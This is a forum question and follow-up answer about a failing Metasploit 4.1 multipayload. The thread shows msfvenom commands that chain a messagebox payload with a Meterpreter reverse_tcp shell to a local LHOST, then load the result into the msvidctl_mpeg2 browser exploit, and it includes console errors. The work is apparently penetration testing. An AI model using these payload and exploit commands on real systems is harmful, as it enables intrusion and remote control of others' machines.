I've been playing around with the newer MSF4 (Framework: 4.1.0-release.13988, Console : 4.1.0-release.13581) multipayload support using msfvenom and the custom/generic payload, but there seems to be a derth of informoration on what the payload supports in terms of encodings and compatibility.
Basically I'm looking at how a server side service can be shutdown, then have the meterpreter listen on it's no longer bound port. (the exploit would come in on another port)
Essentially I created a multipayload using msfvenom with the msgbox and Meterpreter back-to-back, as an exe, raw, and .rb. I've tried leaving the encoding setting alone, and setting it to None. (note that the custom/generic payload .rb source say something about only allowing None encoding)
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw
I also tried it with EXITFUNC set to "none":
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none> test\msgterp.raw
Then I need to write the raw multipayload to something that the generic/custom payload can use: (note I've tried writing to raw, exe, .rb formats)
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw
Finally it's time to try the multipayload out with generic/custom: (note that I reloaded the exploit each time before trying to set and exploit)
msf > use exploit/windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom
PAYLOAD => generic/custom
msf exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw
PAYLOADSTR => c:\metasploit\test\msf.raw
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe
PAYLOADSTR => c:\metasploit\test\msf.exe
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw
PAYLOADFILE => c:\metasploit\test\msf.raw
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe
PAYLOADFILE => c:\metasploit\test\msf.exe
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
So I found an explanation on what the "No encoders encoded..." error is supposed to mean. (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions) This is where stager payloads come in I suppose.
Is the cause of the error the windows/msgbox payload because its not staged? Or is it that multipayloads aren't staged? If it's the later, then I can't see how multipayloads would ever work unless they were staged. Combining 2 payloads would likely be larger than a single payload.
Can someone please at least explain the encodings and formats that should be compatible with the generic/payload payload so I can rule that out? I've only found a couple of references to multipayload support.
Thanks in advance! I promise to reply with how I got this working once I do.
Sorry about the late answer.
There was a bug in MSF 4.1 regarding the msfvenom, not the generic/custom payload. The payloads I was generated were definitely smaller than the 1024 bytes allowable. Here's a thread dedicated to it, where HDM himself suggests it's a bug:
https://community.rapid7.com/thread/1332
And the bug case that was logged along with the fix for msfvenom:
http://dev.metasploit.com/redmine/issues/4714
I just don't think anyone was using the multi-payload support. Don't be confused by my previous clunky use of msfvenom. I was desperate by the time I posted this question so I included everything I thought the problem might be without getting into writing shellcode. I was on the verge of trying to learn how to write a 2-in-1 shellcode test when HDM admitted this was a bug and I decided to go another route. (I grabbed the MSF Pro Trial and setup a VPN pivot to solve my multi-hop test scenario)
Thanks for the response.